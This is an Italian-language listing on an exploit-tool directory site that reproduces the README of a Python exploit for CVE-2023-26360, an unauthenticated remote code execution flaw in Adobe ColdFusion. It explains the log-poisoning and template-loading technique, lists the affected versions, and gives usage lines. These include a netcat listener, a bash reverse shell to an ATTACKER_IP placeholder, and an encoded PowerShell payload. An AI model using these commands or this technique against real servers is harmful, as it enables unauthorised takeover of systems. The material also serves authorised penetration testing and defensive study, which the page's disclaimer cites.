Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

Questo exploit si basa su CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) ed è stato costruito sopra il modulo Metasploit e jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.

Vedi Repository
113 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-26360 — Adobe ColdFusion Esecuzione Remota di Codice non Autenticata

Implementazione in Python dell'exploit di esecuzione remota di codice per CVE-2023-26360, basata sull'analisi del modulo originale Metasploit e sul lavoro precedente di jakabakos.

Perché esiste questo

Il PoC di jakabakos tenta di iniettare <cfexecute> direttamente nel parametro _variables e leggere l'output dal log di ColdFusion in un unico passaggio. Questo approccio fallisce perché ColdFusion non valuta i tag CFML inline in quel contesto, generando un errore 500 senza esecuzione di codice.

Questa implementazione replica il corretto meccanismo a due passaggi utilizzato dal modulo Metasploit:

  1. Avvelenamento del log — invia un payload _variables malformato ({<cftry>CFML</cftry>) all'endpoint CFC vulnerabile. ColdFusion non riesce a interpretarlo e scrive il contenuto grezzo — incluso il codice CFML — in .
coldfusion-out.log
  • Esecuzione del template — sfrutta la vulnerabilità di deserializzazione del nome della classe per caricare il file di log avvelenato come template di ColdFusion, facendo eseguire al server il CFML iniettato.
  • L'esecuzione dei comandi viene effettuata tramite java.lang.Runtime.exec() attraverso createObject, evitando qualsiasi dipendenza da <cfexecute>, che di solito è disabilitato in ambienti hardened o di produzione.

    Versioni affette

    • Adobe ColdFusion 2021 Update 5 e precedenti
    • Adobe ColdFusion 2018 Update 15 e precedenti

    Requisiti

    root@kitploit:~
    pip install -r requirements.txt
    

    Utilizzo

    Avvia un listener prima di eseguire l'exploit:

    root@kitploit:~
    nc -lvnp 4444
    

    Target Windows:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
    

    Target Linux:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
    

    Tramite proxy (es. Burp Suite):

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
    

    Opzioni

    FlagDescrizione
    --hostURL base del target (es. http://192.168.1.10:8500)
    --cmdComando da eseguire sul target
    --winImposta questo flag se il target è un host Windows
    --proxyURL del proxy HTTP (opzionale)

    Come funziona

    root@kitploit:~
    ┌─────────────┐         Step 1: inserisci CFML           ┌──────────────────┐
    │  Attaccante │ ──── POST /_variables={<cftry>...  ──────► iedit.cfc        │
    │             │      CF non riesce a interpretare, logga CFML │                  │
    │             │                                             │ coldfusion-      │
    │             │         Step 2: attiva esecuzione           │ out.log          │
    │             │ ──── POST classname=X..\logs\cf... ────────► (caricato come   │
    │             │                                             │  template CFML)  │
    │  Listener   │ ◄─────────────── reverse shell ────────────│                  │
    └─────────────┘                                             └──────────────────┘
    

    Riferimenti

    • Advisory di Sicurezza Adobe
    • Analisi Rapid7 — AttackerKB
    • Modulo Metasploit
    • PoC di jakabakos

    Dichiarazione di non responsabilità

    Questo strumento è fornito solo per scopi educativi e valutazioni di sicurezza autorizzate (penetration test, CTF, ambienti di laboratorio). Eseguire questo exploit contro sistemi senza esplicita autorizzazione scritta è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

    Scarica lo strumento